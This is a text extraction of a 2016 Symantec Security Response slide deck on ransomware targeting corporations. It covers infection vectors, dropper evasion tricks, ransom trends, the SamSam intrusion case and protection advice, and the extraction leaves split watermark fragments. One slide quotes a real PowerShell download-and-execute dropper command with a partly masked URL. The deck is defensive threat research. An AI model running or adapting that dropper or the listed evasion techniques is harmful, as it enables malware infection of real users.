Copyright 2016, Symantec Corporation

Candid WüestSymantec Security Response

1

Corporations –the new victims of targeted ransomware

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Ransomware is popular…… because it is profitable

2

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

3© Forbes

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

WHY ?

4What if there were no hypothetical questions?

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Because it is profitable!

$ 209 Million damageJan-March 2016

(according to FBI)

5A clear conscience is usually the sign of a bad memory.

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

• Email

– Link to malicious file on Dropbox & Co.

–Office document with malicious macro

– Script file (JavaScript, VBS, PowerShell, …)

• Sometimes in container (Zip, RAR, HTA, WSF, LNK,…) with password

• Infected Websites

–Web exploit toolkits (1.4 Mio attacks blocked / day)

• Rig, Magnitude etc.

–Malvertisement

• With any coding language out there

– Incl. Python, Powershell, JS, Google's Go Language,…

The common infection vector

6Hard work never killed anyone, but why take the chance?

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Enabling Macros with Social Engineering

7I don’t suffer from insanity; I enjoy every minute of it.

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Infection droppers trends

Use of scripting languages to evade detection/sandboxes

– Obfuscated: JavaScript, PHP, PowerShell, Python, VBS,…

– JS conditional compilation trick /*@cc_on @*/

– Macro to check for VM (environment checks)

• “InkPicture_Painted” instead Document_Open() or AutoOpen() trigger

• Application.RecentFiles.Count <3

– Script to check IPs before payload download (e.g. MaxMind service)

• Payload execution

– Execute dll with rundll32.exe and export string

– Seed parameter from JS (to decrypt payload)

– Encrypted archive or installer package

8

powershell.exe -ExecutionPolicy Bypass -WindowStyleHidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://********lied socialinnovation.org/plugins/office365', $f); (New-Object -com WScript.Shell).Exec($f)

2 + 2 = 5 for extremely large values of 2!

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Powershell ransomware

9I used to be indecisive. Now I'm not sure.

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Ransomware Cryptolocker expansion

10

100 new families identified in 2015 77 in 2014, 88 in 2016*

CAPS LOCK – Preventing Login Since 1980.

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Ransomware-as-a-service

11I'd like to help you out, which way did you come in?

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Top 10 infections on 29.10.2016

12… error joke not found

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Show me the money

13

$372.53

$294.14

$679.65

$0

$100

$200

$300

$400

$500

$600

$700

$800

2014 2015 2016

• Ransom is usually requested in Bitcoins

• The average ransom has more than doubled last year

Artificial intelligence is no match for natural stupidity.

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

How to make even more money?• Payment features

– Tesla chat support and free sample decryption

– CryptXXX steals Bitcoin wallet data

– Cerber adds machines to botnet to carry out DDoS attacks.

– Use of Amazon/iTunes/phone gift cards instead of Bitcoins

• New threats added to ransom note

– Chimera threatens to post personal data online

– Jigsaw deletes random files over time

– Stampado re-encrypts already encrypted files from other cryptolockers

– Virolock Spreads to shares and cloud storage as fileinfector

14I didn't say it was your fault, I said I was blaming you.

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Where are the victims?

15

3%Canada

8%

5%

United Kingdom

Belgium

Netherlands

India3%

Italy

3%

4% Germany

2%Australia

4%

8% Japan

United States

31%

Is “NO” the correct answer to this question?

Currently big wave in Brazil

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

16

Businesses as a target43% of ransomware infections occur inside organizationsEmployees like to open private emails at work

Smith & Wesson: The original point and click interface.

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Advanced attack techniques

17

Recent ransomware attacks use tactics and techniques typically seen in “APT”-style attacks

Infiltration Exploit server-side vulnerabilities to gain access to the network.

ReconnaissanceAttackers gather information that may help in later stages of the attack, such as back-up policy. Information gathered may also be used in the ransom note.

Lateral movementAttackers use publicly available tools to plot out and traverse the network and gain access to strategic locations like ICS or DB systems

StealthOnce the attack has been successfully carried out the attackers attempt to hide their tracks by removing any tools used.

What happens if you get scared half to death, twice?

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Example: SamSam case

• Entry point was unpatched web server; exploited JBoss vulnerability with JexBoss

• Used psExec and retrieved passwords to traverse the network

• Deleted backups to make recovery difficult

• Deployed SamSam strain of ransomware

• Removed copies of malware and associated tools to hide tracks

• Ransom was 1.5 Bitcoin (~US$989) for each computer

18Everyone is entitled to his own opinion, but not to his own facts.

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Further TTPs seen

• Attack remote access tools

– Bruteforcing passwords for RDP, Teamviewer, VNC, FTP, …

• Exploit webserver and jump further from there

– SQLinjection to modify DB content

• Spear phishing

• Some groups try POS or BEC scams first, and then move to ransomware

• Some «ATP» groups use ransomware instead of wiper to hide intention

19I can explain it to you, but I can not undestand it for you

Not very sophisticatedBut often successful

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

What are they after?

• Documents

• Databases (encrypt data or change password)

• Fileshares/cloud (even if not mapped: passwords from mimikatz or enumtools)

• Websites

– E.g. added «mcrypt_encrypt()» to DB calls

• The backups (to delete them, infect them or encrypt them)

• In some rare cases industrial controller, more likely classical blackmailing

20If I agreed with you we’d both be wrong

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Victim organization profile

Services37.8%

Manufacturing17.2%

Public Administration 10.2%

Finance, Insurance, & Real Estate

9.8%

Wholesale8.9%

Transportation, Comms, & Utilities

6.6%

Retail4.3%

Construction3.9%

Mining1.0%

Agri, Forestry, & Fishing0.5%

What about Healthcare?

Healthcare seeing more targeted attacks and

therefore not reflected in the numbers

21All generalizations are false.

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Crypto is difficult (for most people)

22Press SPACEBAR once to quit or twice to save changes..

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Protection strategies

• Backup your data (out of reach!)

• Keep your system and software up-to-date

• Doublecheck shared folders

– Does it auto sync to cloud?

– How is your fileserver protected?

• Follow best practices (2FA, security software,…)

– Disable scripts, powershell etc. if you dont use it

• Be prepared - play the exercise drill

• Some have experimented with «honeyfiles» and «folder-sinkholes»

23Always remember you're unique, just like everyone else.

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

Don’t forget your phones

24

• Android Ransomware is out there

• IoT device ransomware not seen at large in the wild, but possible

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

100 new families identified in 2015, most not sophisticated

Scripts are popular to evade first-step detection

Employees in organizations represent 43% of infections

There are ransomware groups going after organizations

Most attacks are not targeted, but still devastating

It is profitable for the attackers, so it won’t go away overnight

Summary – keep your data safe!

25Better to understand a little than to misunderstand a lot.

Thank you!

Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.

Threat Researcher - Symantec Security Response

Candid Wüest

Co

pyr

igh

t 2

01

6, S

yman

tec

Co

rpo

rati

on

27I like birthdays, but I think too many can kill you.